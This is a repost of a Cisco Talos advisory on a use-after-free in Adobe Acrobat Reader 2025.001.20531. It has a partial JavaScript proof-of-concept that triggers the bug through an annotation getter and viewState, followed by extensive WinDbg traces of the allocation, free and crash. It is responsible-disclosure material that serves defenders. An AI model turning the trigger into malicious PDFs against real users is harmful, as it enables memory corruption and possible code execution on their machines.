Adobe Acrobat Reader Page Property Use-After-Free Vulnerability
Adobe Acrobat Reader 2025.001.20531版本中存在一个use-after-free漏洞,可能导致内存损坏和任意代码执行。攻击者可通过诱骗用户打开恶意PDF文件触发此漏洞。 2025-9-22 23:59:12 Author: talosintelligence.com(查看原文) 阅读量:0 收藏
Adobe Acrobat Reader 2025.001.20531版本中存在一个use-after-free漏洞,可能导致内存损坏和任意代码执行。攻击者可通过诱骗用户打开恶意PDF文件触发此漏洞。 2025-9-22 23:59:12 Author: talosintelligence.com(查看原文) 阅读量:0 收藏
SUMMARY
A use-after-free vulnerability exists in the page property functionality of Adobe Acrobat Reader 2025.001.20531. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Adobe Acrobat Reader 2025.001.20531
PRODUCT URLS
Acrobat Reader - https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html
CVSSv3 SCORE
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE
CWE-416 - Use After Free
DETAILS
Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs.
Adobe PDF Reader supports various page properties. A use-after-free vulnerability exists in the way Adobe Acrobat Reader processes one of these properties. This can be illustrated by the following proof-of-concept code:
function main() {
[...]
var tmp_annot = {page: 0, type: "Squiggly", point: [3,2,9,4], name : "AAA"};
Object.defineProperty(tmp_annot, "type", { get: fv_state });
app.activeDocs[0].addAnnot(tmp_annot);
[...]
app.activeDocs[0].pageNum = 2;
}
function fv_state() {
app.activeDocs[0].viewState = {
a: app.fs.backgroundColor["0"],
b: app.activeDocs[0].getField('Text Field1')['submitName'],
c: event.richValue,
d: ]app.activeDocs[0].getField('List Box0')['rect']
};
}
In this case, when the fv_state() function is called, it frees properties related to the AVPageLayoutEngine object. The use-after-free vulnerability occurs when the program later accesses this freed object without proper validation. We can observe the following in the debugger (with PageHeap enabled):
eax=04afce24 ebx=c1188e28 ecx=04afce2f edx=b11bcfd0 esi=6eb665e0 edi=c2c68f68
eip=6eb66cab esp=04afce08 ebp=04afce30 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200282
AcroRd32!DllCanUnloadNow+0x17ec8b:
6eb66cab e8f675e4ff call AcroRd32!AcroWinMainSandbox+0x3346 (6e9ae2a6) ;<----------- (1)
0:000> u 6EB66CA4
AcroRd32!DllCanUnloadNow+0x17ec84:
6eb66ca4 6a01 push 1
6eb66ca6 68e4020000 push 2E4h ; <------------------------------------ (2)
6eb66cab e8f675e4ff call AcroRd32!AcroWinMainSandbox+0x3346 (6e9ae2a6)
6eb66cb0 59 pop ecx
6eb66cb1 59 pop ecx
6eb66cb2 8bc8 mov ecx,eax
6eb66cb4 894df0 mov dword ptr [ebp-10h],ecx
6eb66cb7 33c0 xor eax,eax
0:000> p
eax=b8df2d18 ebx=c1188e28 ecx=00000001 edx=00000000 esi=6eb665e0 edi=c2c68f68
eip=6eb66cb0 esp=04afce08 ebp=04afce30 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
AcroRd32!DllCanUnloadNow+0x17ec90:
6eb66cb0 59 pop ecx
0:000> dd eax ;<----------------------------------- (3)
b8df2d18 00000000 00000000 00000000 00000000
b8df2d28 00000000 00000000 00000000 00000000
b8df2d38 00000000 00000000 00000000 00000000
b8df2d48 00000000 00000000 00000000 00000000
b8df2d58 00000000 00000000 00000000 00000000
b8df2d68 00000000 00000000 00000000 00000000
b8df2d78 00000000 00000000 00000000 00000000
b8df2d88 00000000 00000000 00000000 00000000
0:000> pc
eax=00000000 ebx=c1188e28 ecx=b8df2d18 edx=00000000 esi=6eb665e0 edi=c2c68f68
eip=6eb66cc0 esp=04afce10 ebp=04afce30 iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200286
AcroRd32!DllCanUnloadNow+0x17eca0:
6eb66cc0 e82c000000 call AcroRd32!DllCanUnloadNow+0x17ecd1 (6eb66cf1) ;<----------------------------------- (4)
At (1) above, a method is called which calls malloc to allocate an AVPageLayoutEngine object of the size 0x2E4.The AVPageLayoutEngine object is examined at (3). The method called at (4) initialized the AVPageLayoutEngine object.
0:000> g
Breakpoint 1 hit
eax=00000000 ebx=00000005 ecx=b8df2d80 edx=00000000 esi=b8df2d80 edi=00000000
eip=6eb676ae esp=04afcdac ebp=04afcdd0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
AcroRd32!DllCanUnloadNow+0x17f68e:
6eb676ae 6a20 push 20h ; <-------------------------------- (5)
0:000> p
eax=00000000 ebx=00000005 ecx=b8df2d80 edx=00000000 esi=b8df2d80 edi=00000000
eip=6eb676b0 esp=04afcda8 ebp=04afcdd0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
AcroRd32!DllCanUnloadNow+0x17f690:
6eb676b0 897e08 mov dword ptr [esi+8],edi ds:002b:b8df2d88=00000000
0:000> p
eax=00000000 ebx=00000005 ecx=b8df2d80 edx=00000000 esi=b8df2d80 edi=00000000
eip=6eb676b3 esp=04afcda8 ebp=04afcdd0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
AcroRd32!DllCanUnloadNow+0x17f693:
6eb676b3 e8ee6be4ff call AcroRd32!AcroWinMainSandbox+0x3346 (6e9ae2a6) ; <-------------------------------- (6)
0:000> p
eax=78fe8fe0 ebx=00000005 ecx=00000001 edx=00000000 esi=b8df2d80 edi=00000000
eip=6eb676b8 esp=04afcda8 ebp=04afcdd0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
AcroRd32!DllCanUnloadNow+0x17f698:
6eb676b8 59 pop ecx
0:000> dd eax ; <-------------------------------- (7)
78fe8fe0 00000000 00000000 00000000 00000000
78fe8ff0 00000000 00000000 00000000 00000000
78fe9000 ???????? ???????? ???????? ????????
78fe9010 ???????? ???????? ???????? ????????
78fe9020 ???????? ???????? ???????? ????????
78fe9030 ???????? ???????? ???????? ????????
78fe9040 ???????? ???????? ???????? ????????
78fe9050 ???????? ???????? ???????? ????????
0:000> pt
eax=b8df2d80 ebx=00000005 ecx=6eb676d9 edx=bf3dcfd8 esi=b8df2d18 edi=c2c68f68
eip=6eb676d9 esp=04afcdd4 ebp=04afcdf8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
AcroRd32!DllCanUnloadNow+0x17f6b9:
6eb676d9 c3 ret
0:000> dd b8df2d18 + 74 ; <-------------------------------- (8)
b8df2d8c 78fe8fe0 00000000 00000000 00000000
b8df2d9c 00000000 00000000 00000000 00000000
b8df2dac 00000000 00000000 00000000 00000000
b8df2dbc 00000000 00000000 00000000 00000000
b8df2dcc 00000000 00000000 00000000 00000000
b8df2ddc 00000000 00000000 00000000 00000000
b8df2dec 00000000 00000000 00000000 00000000
b8df2dfc 00000000 00000000 00000000 00000000
[...]
dd b8df2d18 + 74 ; <-------------------------------- (9)
b8df2d8c f864afe0 707f3e14 00000001 00000002
b8df2d9c f91aafe0 707f3e14 00000001 00000002
b8df2dac f91acfe0 707f3e14 00000001 00000002
b8df2dbc f68fcfe0 707f3e14 00000001 00000002
b8df2dcc f68fefe0 707f3e14 00000001 00000002
b8df2ddc f8c2afe0 707f3e14 00000001 00000002
b8df2dec f6c92fe0 707f3e14 00000001 00000002
b8df2dfc f8742fe0 707f3e14 00000001 00000001
The initialization method calls a method to create a type of property store object, with a size of 0x20 bytes, as shown at (5) . The method called at (6) allocates the vulnerable property store object, which can be seen after allocation at (7). Each property store object is written into the AVPageLayoutEngine structure starting at offset 0x74, with each subsequent property store placed 0x10 bytes after the previous one. The AVPageLayoutEngine object after the property store objects have been written can be seen at (9). These objects may be allocated and updated multiple times, depending on the JavaScript code being executed. Eventually, one of the property store objects is used after it has been freed.
eax=3e14bf98 ebx=04afe684 ecx=b8df2d18 edx=00000000 esi=00000000 edi=04afe684
eip=6ebbe568 esp=04afd618 ebp=04afe690 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
AcroRd32!DllCanUnloadNow+0x1d6548:
6ebbe568 c744240400002041 mov dword ptr [esp+4],41200000h ss:002b:04afd61c=048f4000
0:000> dd b8df2d18+74 ; <-------------------------------- (10)
b8df2d8c f55aefe0 707f3e14 00000000 00000001
b8df2d9c efc9cfe0 707f3e14 00000000 00000001
b8df2dac f1adefe0 707f3e14 00000000 00000001
b8df2dbc f55c6fe0 707f3e14 00000000 00000001
b8df2dcc f396cfe0 707f3e14 00000000 00000001
b8df2ddc f94d1230 707f3e14 00000000 00000001
b8df2dec f94d1288 707f3e14 00000000 00000001
b8df2dfc f94cc5e8 707f3e14 00000000 00000001
0:000> dd f55aefe0 ; <-------------------------------- (11)
f55aefe0 ???????? ???????? ???????? ????????
f55aeff0 ???????? ???????? ???????? ????????
f55af000 ???????? ???????? ???????? ????????
f55af010 ???????? ???????? ???????? ????????
f55af020 ???????? ???????? ???????? ????????
f55af030 ???????? ???????? ???????? ????????
f55af040 ???????? ???????? ???????? ????????
f55af050 ???????? ???????? ???????? ????????
0:000> pc
eax=3e14bf98 ebx=04afe684 ecx=b8df2d18 edx=00000000 esi=00000000 edi=04afe684
eip=6ebbe57a esp=04afd614 ebp=04afe690 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
AcroRd32!DllCanUnloadNow+0x1d655a:
6ebbe57a e838040000 call AcroRd32!DllCanUnloadNow+0x1d6997 (6ebbe9b7)
0:000> t
eax=3e14bf98 ebx=04afe684 ecx=b8df2d18 edx=00000000 esi=00000000 edi=04afe684
eip=6ebbe9b7 esp=04afd610 ebp=04afe690 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
AcroRd32!DllCanUnloadNow+0x1d6997:
6ebbe9b7 55 push ebp
0:000> pc
eax=04afd618 ebx=00000001 ecx=b8df2d80 edx=00000000 esi=00000001 edi=b8df2d18
eip=6ebbe9d2 esp=04afd5e0 ebp=04afd60c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
AcroRd32!DllCanUnloadNow+0x1d69b2:
6ebbe9d2 e83a020000 call AcroRd32!DllCanUnloadNow+0x1d6bf1 (6ebbec11)
At (10), we can examine AVPageLayoutEngine buffer. The first property store object is freed, as shown at (11). The vulnerable freed buffer is later used without any validation. This can be observed in a debugger at the time of the crash:
0:000> p
(263c.1968): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=b8df2d80 ecx=f55aefe0 edx=00000000 esi=f55aefe0 edi=00000000
eip=6eb09230 esp=04afd574 ebp=04afd57c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
AcroRd32!DllCanUnloadNow+0x121210:
6eb09230 8b4e04 mov ecx,dword ptr [esi+4] ds:002b:f55aefe4=???????? ; <-------------------------------- (12)
0:000> !ext.heap -p -a f55aefe4
address f55aefe4 found in
_DPH_HEAP_ROOT @ 9441000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
f54d1138: f55ae000 2000
72d4ab02 verifier!AVrfDebugPageHeapFree+0x000000c2
77aafa36 ntdll!RtlDebugFreeHeap+0x0000003e
77a14016 ntdll!RtlpFreeHeap+0x000000d6
77a581fd ntdll!RtlpFreeHeapInternal+0x00000783
77a13ee6 ntdll!RtlFreeHeap+0x00000046
77163c9b ucrtbase!_free_base+0x0000001b
77163c68 ucrtbase!free+0x00000018
6e9b02e9 AcroRd32!AcroWinMainSandbox+0x00005389
6eb67ce4 AcroRd32!DllCanUnloadNow+0x0017fcc4
6ea18f8e AcroRd32!DllCanUnloadNow+0x00030f6e
6f0fa6c4 AcroRd32!ixVectorNextHit+0x00181f84
6ebbe9d7 AcroRd32!DllCanUnloadNow+0x001d69b7
6ebbe3a0 AcroRd32!DllCanUnloadNow+0x001d6380
6eb75d20 AcroRd32!DllCanUnloadNow+0x0018dd00
6ebbdc49 AcroRd32!DllCanUnloadNow+0x001d5c29
6ebbd3f7 AcroRd32!DllCanUnloadNow+0x001d53d7
6ebbc7cf AcroRd32!DllCanUnloadNow+0x001d47af
6f6a29cf AcroRd32!AIDE::PixelPartInfo::operator=+0x00293a8f
fa26f9c8 EScript!PlugInMain+0x000553c8
fa22618c EScript!PlugInMain+0x0000bb8c
fa116300 EScript!mozilla::HashBytes+0x000395f0
fa0eadad EScript!mozilla::HashBytes+0x0000e09d
fa0ea5ce EScript!mozilla::HashBytes+0x0000d8be
fa1110cc EScript!mozilla::HashBytes+0x000343bc
fa10ae63 EScript!mozilla::HashBytes+0x0002e153
fa107c9b EScript!mozilla::HashBytes+0x0002af8b
fa107b12 EScript!mozilla::HashBytes+0x0002ae02
fa107a6d EScript!mozilla::HashBytes+0x0002ad5d
fa0ec8a3 EScript!mozilla::HashBytes+0x0000fb93
fa125a8d EScript!mozilla::HashBytes+0x00048d7d
0:000> u
AcroRd32!DllCanUnloadNow+0x121210:
6eb09230 8b4e04 mov ecx,dword ptr [esi+4]
6eb09233 8b4618 mov eax,dword ptr [esi+18h]
6eb09236 d3ea shr edx,cl
6eb09238 8b4e14 mov ecx,dword ptr [esi+14h]
6eb0923b 2bc1 sub eax,ecx
6eb0923d c1f802 sar eax,2
6eb09240 3bd0 cmp edx,eax
6eb09242 7318 jae AcroRd32!DllCanUnloadNow+0x12123c (6eb0925c)
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 04afd57c 6ebbef0e 00000000 00000000 00000001 AcroRd32!DllCanUnloadNow+0x121210
01 04afd594 6ebbec97 00000001 00000001 04afd618 AcroRd32!DllCanUnloadNow+0x1d6eee
02 04afd5d8 6ebbe9d7 00000001 00000001 04afd618 AcroRd32!DllCanUnloadNow+0x1d6c77
03 04afd60c 6ebbe57f 00000001 41200000 41200000 AcroRd32!DllCanUnloadNow+0x1d69b7
04 04afe690 6eb75d20 00000001 00000000 00000001 AcroRd32!DllCanUnloadNow+0x1d655f
05 04afe6ac 6ebbdc49 00000001 f8a4e526 c1188e28 AcroRd32!DllCanUnloadNow+0x18dd00
06 04afe73c 6ebbd3f7 00000001 00000001 c1188e28 AcroRd32!DllCanUnloadNow+0x1d5c29
07 04afe750 6ebbc7cf c1188e28 00000001 f8a4e5a6 AcroRd32!DllCanUnloadNow+0x1d53d7
08 04afe7bc 6f6a29cf 00000002 00000002 6f6a29b0 AcroRd32!DllCanUnloadNow+0x1d47af
09 04afe7d0 fa26f9c8 c1188e28 00000002 5a29b548 AcroRd32!AIDE::PixelPartInfo::operator=+0x293a8f
0a 04afe808 fa22618c f9905a60 fda683d0 fea2e638 EScript!PlugInMain+0x553c8
0b 04afe874 fa116300 fa678000 04afe9dc 04afe894 EScript!PlugInMain+0xbb8c
0c 04afe8bc fa0eadad fa678000 04afe9dc 04afe9dc EScript!mozilla::HashBytes+0x395f0
0d 04afe908 fa0ea5ce fa678000 04afe9dc 04afe9dc EScript!mozilla::HashBytes+0xe09d
0e 04afe9b4 fa1110cc fa678000 04afe9dc 04afe9dc EScript!mozilla::HashBytes+0xd8be
0f 04afe9f4 fa10ae63 fa678000 04afea38 fb8b9e81 EScript!mozilla::HashBytes+0x343bc
10 04afebcc fa107c9b 00000000 04afebc8 04afebd4 EScript!mozilla::HashBytes+0x2e153
11 04afebf8 fa107b12 fa678000 04afec08 fa2fa194 EScript!mozilla::HashBytes+0x2af8b
12 04afec44 fa107a6d fa678000 04afecbc fab29a10 EScript!mozilla::HashBytes+0x2ae02
13 04afec90 fa0ec8a3 fa678000 04afecbc fab29a10 EScript!mozilla::HashBytes+0x2ad5d
14 04afece0 fa125a8d fa678000 04afed28 00000000 EScript!mozilla::HashBytes+0xfb93
15 04afed64 fa235e4b fa678000 fab29a10 fa6b52d0 EScript!mozilla::HashBytes+0x48d7d
16 04afef18 fa235ab3 f9381700 f957d848 f9381748 EScript!PlugInMain+0x1b84b
17 04afef64 fa234893 f94ba758 f9905a60 f9e88550 EScript!PlugInMain+0x1b4b3
18 04aff004 fa29d4d1 b564cb58 f9905a60 f949ae30 EScript!PlugInMain+0x1a293
19 04aff048 6ea6eca5 f97404c0 f8a4f2ba 23098f50 EScript!PlugInMain+0x82ed1
1a 04aff0a0 6ea6e2b4 00005e0f f8a4f322 23098f10 AcroRd32!DllCanUnloadNow+0x86c85
1b 04aff138 6ea6ded6 3e165fc8 00005e0f 6ea6dcb7 AcroRd32!DllCanUnloadNow+0x86294
1c 04aff194 6e9ba2dd 000004d3 00000000 00000113 AcroRd32!DllCanUnloadNow+0x85eb6
1d 04aff1b0 7588145b 004805c0 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xf37d
1e 04aff1dc 75877b4a 6e9b9e90 004805c0 00000113 USER32!_InternalCallWinProc+0x2b
1f 04aff2c4 758763f0 6e9b9e90 00000000 00000113 USER32!UserCallWinProcCheckWow+0x33a
20 04aff340 75875f20 00000013 04aff364 6ea6d716 USER32!DispatchMessageWorker+0x4c0
21 04aff34c 6ea6d716 04aff380 3e14fd80 3e14fd80 USER32!DispatchMessageW+0x10
22 04aff364 6ea6d0be 04aff380 f8a4f1c2 3e14fd80 AcroRd32!DllCanUnloadNow+0x856f6
23 04aff3d8 6ea6ced4 f8a4f60a 3e14fd80 00000000 AcroRd32!DllCanUnloadNow+0x8509e
24 04aff410 6e9abd17 f8a4f69e 23216ff8 00000000 AcroRd32!DllCanUnloadNow+0x84eb4
25 04aff484 6e9ab0ec 6e590000 001b0000 23216ff8 AcroRd32!AcroWinMainSandbox+0xdb7
26 04aff8a8 0038a6a5 6e590000 001b0000 23216ff8 AcroRd32!AcroWinMainSandbox+0x18c
27 04affcf8 00409f9a 001b0000 00000000 09460018 AcroRd32_exe!CreateCoreWebview2EnvironmentSandbox+0x10d995
28 04affd44 75affcc9 048f1000 75affcb0 04affdb0 AcroRd32_exe!AcroRd32IsBrokerProcess+0x1bbda
29 04affd54 77a382ae 048f1000 273d0661 00000000 KERNEL32!BaseThreadInitThunk+0x19
2a 04affdb0 77a3827e ffffffff 77a59345 00000000 ntdll!__RtlUserThreadStart+0x2f
2b 04affdc0 00000000 00386610 048f1000 00000000 ntdll!_RtlUserThreadStart+0x1b
Depending on the memory layout of the process, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
TIMELINE
2025-07-14 - Vendor Disclosure
2025-09-09 - Vendor Patch Release
2025-09-23 - Public Release
Discovered by KPC of Cisco Talos.
文章来源: https://talosintelligence.com/vulnerability_reports/TALOS-2025-2222
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh